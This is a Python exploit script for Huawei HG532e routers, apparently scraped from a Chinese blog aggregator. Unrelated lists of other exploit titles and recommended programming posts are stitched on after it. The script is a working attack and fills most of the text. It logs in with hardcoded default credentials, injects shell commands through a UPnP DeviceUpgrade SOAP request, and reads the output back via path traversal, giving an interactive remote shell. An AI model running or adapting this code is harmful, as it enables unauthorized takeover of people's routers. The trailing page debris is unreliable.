#!/bin/python

'''

    Author : Rebellion

    Github : @rebe11ion

    Twitter : @rebellion

'''

import urllib2,requests,os,sys

from requests.auth import HTTPDigestAuth

DEFAULT_HEADERS = {"User-Agent": "Mozilla", }

DEFAULT_TIMEOUT = 5

def fetch_url(url):

    global DEFAULT_HEADERS, DEFAULT_TIMEOUT

    request = urllib2.Request(url, headers=DEFAULT_HEADERS)

    data = urllib2.urlopen(request, timeout=DEFAULT_TIMEOUT).read()

    return data

def exploit(ip, path):

    url = "http://%s:37215/icon/../../../%s" % (ip, path)

    data = fetch_url(url)

    return data

def main():

    pwd = "/"

    cmd_path = "/tmp/ccmd"

    pwd_path = "/tmp/cpwd"

    while True:

       targetip = sys.argv[1]

       cmd_ = raw_input("[{}]$ ".format(pwd))

       cmd = "cd {} ; {} > {} ; pwd > {}".format(pwd,cmd_.split("|")[0],cmd_path,pwd_path)

       rm = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"

       url = "http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1"

       requests.post(url, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)

       assert cmd_path.startswith("/"), "An absolute path is required"

       data = exploit(targetip, cmd_path)

       open(cmd_path,"wb").write(data)

       if "cd" in cmd_:

          pass

       elif "clear" in cmd_:

          os.system("clear")

       elif "cat" in cmd_:

          os.system(cmd_.replace(cmd_.split("cat")[1].split(" ")[1],cmd_path))

       else:

          if "|" in cmd_:

             os.system("cat {} | {}".format(cmd_path,cmd_.split("|")[1]))

          else:

             os.system("cat {}".format(cmd_path))

       pwd = exploit(targetip,pwd_path).strip("\n")

if __name__ == "__main__":

    main()

[EXP]Huawei Router HG532e - Command Execution的更多相关文章

  1. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  4. PowerShell vs. PsExec for Remote Command Execution

    Posted by Jianpeng Mo / January 20, 2014 Monitoring and maintaining large-scale, complex, highly dis ...

  5. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  6. MYSQL报Fatal error encountered during command execution.错误的解决方法

    {MySql.Data.MySqlClient.MySqlException (0x80004005): Fatal error encountered during command executio ...

  7. My SQL和LINQ 实现ROW_NUMBER() OVER以及Fatal error encountered during command execution

    Oracle 和SQL server都有ROW_NUMBER() OVER这个功能函数,主要用于分组排序,而MySQL 却没有 SELECT * FROM (SELECT ROW_NUMBER() O ...

  8. JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution

    CVE ID : CVE-2019-7727 JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution description=========== ...

  9. Fatal error encountered during command execution

    MySQL + .net + EF 开发环境,调用一处sql语句报错: Fatal error encountered during command execution[sql] view plain ...

随机推荐

  1. gitlab 备份与恢复

    1. gitlab 备份命令:# gitlab-rake gitlab:backup:create 1.1 查看备份文件(默认备份路径:/var/opt/gitlab/backups)# ls /va ...

  2. python爬虫小说代码,可用的

    python爬虫小说代码,可用的,以笔趣阁为例子,python3.6以上,可用 作者的QQ:342290433,汉唐自远工程师 import requests import refrom lxml i ...

  3. RFID数据清洗与数据清洗的区别

    RFID数据清洗和一般数据清洗的不同: RFID数据清洗已经跨越到硬件范畴!造成脏数据的原因是硬件原理和硬件所处环境本身!要提高RFID数据清洗能力,就必须同时研究技术原理和环境本身之间的互动关系,而 ...

  4. Python练习-迭代-2018.11.28

    #遍历list L=['a','b','c','d'] l=[] a=0 for n in L: l.insert(a,n) a=a+1 print(l) #遍历dict里的key,导出为list L ...

  5. Python面向对象中的classmethod类方法和__getattr__方法介绍

    一.classmethod介绍 介绍:@classmethod修饰符我们从名称就可以知道,这是一个类方法,那么和普通的类中的方法有什么不同的 a.类方法,是由类本身调用的,无需实例化类,直接用类本身调 ...

  6. SpringMVC不能引入静态资源

    SpringMVC不能引入静态资源 问题:部署项目后程序加载或用浏览器访问时出现类似的警告, 2011-01-19 10:52:51,646 WARN [org.springframework.web ...

  7. 4412 uboot启动分析

    感谢sea1105, https://blog.csdn.net/sea1105/article/details/52142772 在学习过程中,由于tiny4412资料太过于少,因此参考210的视屏 ...

  8. Eigen使用矩阵作为函数参数

    1 使用矩阵作为函数参数介绍 文章来源Writing Functions Taking %Eigen Types as Parameters Eigen为了在函数中传递不同的类型使用了表达式模板技术. ...

  9. Android 获得本地IP地址、外网IP地址、本设备网络状态信息、本地Mac地址

    本地内网IP和外网IP的区别: 根据我的经验一台电脑需要两个ip才可以上网,一个是本地的内网ip 一个是外网的ip 本地的ip 一般是192.168.1.2这种样子  只要在不同的路由器上可以重复 外 ...

  10. leveldb 学习记录(一) skiplist

    leveldb LevelDb是一个持久化存储的KV系统,并非完全将数据放置于内存中,部分数据也会存储到磁盘上. 想了解这个由谷歌大神编写的经典项目. 可以从数据结构以及数据结构的处理下手,也可以从示 ...